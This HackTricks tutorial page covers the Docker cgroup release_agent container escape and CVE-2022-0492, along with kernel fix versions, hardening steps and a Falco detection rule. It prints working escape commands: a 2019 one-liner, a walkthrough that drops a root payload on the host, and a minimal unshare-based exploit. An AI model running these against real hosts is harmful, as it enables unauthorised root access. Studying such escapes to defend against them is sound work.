Docker release_agent cgroups escape

Reading time: 5 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

For further details, refer to the original blog post. This is just a summary:


Classic PoC (2019)

shell
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The PoC abuses the cgroup-v1 release_agent feature: when the last task of a cgroup that has notify_on_release=1 exits, the kernel (in the initial namespaces on the host) executes the program whose pathname is stored in the writable file release_agent. Because that execution happens with full root privileges on the host, gaining write access to the file is enough for a container escape.

Short, readable walk-through

  1. Prepare a new cgroup

    mkdir /tmp/cgrp
    mount -t cgroup -o rdma cgroup /tmp/cgrp   # or –o memory
    mkdir /tmp/cgrp/x
    echo 1 > /tmp/cgrp/x/notify_on_release
    
  2. Point release_agent to attacker-controlled script on the host

    host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
    echo "$host_path/cmd" > /tmp/cgrp/release_agent
    
  3. Drop the payload

    cat <<'EOF' > /cmd
    

#!/bin/sh ps aux > "$host_path/output" EOF chmod +x /cmd


4. **Trigger the notifier**

```shell
sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"   # add ourselves and immediately exit
cat /output                                  # now contains host processes

2022 kernel vulnerability – CVE-2022-0492

In February 2022 Yiqi Sun and Kevin Wang discovered that the kernel did not verify capabilities when a process wrote to release_agent in cgroup-v1 (function cgroup_release_agent_write).

Effectively any process that could mount a cgroup hierarchy (e.g. via unshare -UrC) could write an arbitrary path to release_agent without CAP_SYS_ADMIN in the initial user namespace. On a default-configured, root-running Docker/Kubernetes container this allowed:

  • privilege escalation to root on the host; ↗
  • container escape without the container being privileged.

The flaw was assigned CVE-2022-0492 (CVSS 7.8 / High) and fixed in the following kernel releases (and all later):

  • 5.16.2, 5.15.17, 5.10.93, 5.4.176, 4.19.228, 4.14.265, 4.9.299.

Patch commit: 1e85af15da28 "cgroup: Fix permission checking".

Minimal exploit inside a container

bash
# prerequisites: container is run as root, no seccomp/AppArmor profile, cgroup-v1 rw inside
apk add --no-cache util-linux  # provides unshare
unshare -UrCm sh -c '
  mkdir /tmp/c; mount -t cgroup -o memory none /tmp/c;
  echo 1 > /tmp/c/notify_on_release;
  echo /proc/self/exe > /tmp/c/release_agent;     # will exec /bin/busybox from host
  (sleep 1; echo 0 > /tmp/c/cgroup.procs) &
  while true; do sleep 1; done
'

If the kernel is vulnerable the busybox binary from the host executes with full root.

Hardening & Mitigations

  • Update the kernel (≥ versions above). The patch now requires CAP_SYS_ADMIN in the initial user namespace to write to release_agent.
  • Prefer cgroup-v2 – the unified hierarchy removed the release_agent feature completely, eliminating this class of escapes.
  • Disable unprivileged user namespaces on hosts that do not need them:
    sysctl -w kernel.unprivileged_userns_clone=0
    
  • Mandatory access control: AppArmor/SELinux policies that deny mount, openat on /sys/fs/cgroup/**/release_agent, or drop CAP_SYS_ADMIN, stop the technique even on vulnerable kernels.
  • Read-only bind-mask all release_agent files (Palo Alto script example):
    for f in $(find /sys/fs/cgroup -name release_agent); do
        mount --bind -o ro /dev/null "$f"
    done
    

Detection at runtime

Falco ships a built-in rule since v0.32:

yaml
- rule: Detect release_agent File Container Escapes
  desc: Detect an attempt to exploit a container escape using release_agent
  condition: open_write and container and fd.name endswith release_agent and
             (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and
             thread.cap_effective contains CAP_SYS_ADMIN
  output: "Potential release_agent container escape (file=%fd.name user=%user.name cap=%thread.cap_effective)"
  priority: CRITICAL
  tags: [container, privilege_escalation]

The rule triggers on any write attempt to */release_agent from a process inside a container that still wields CAP_SYS_ADMIN.

References

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks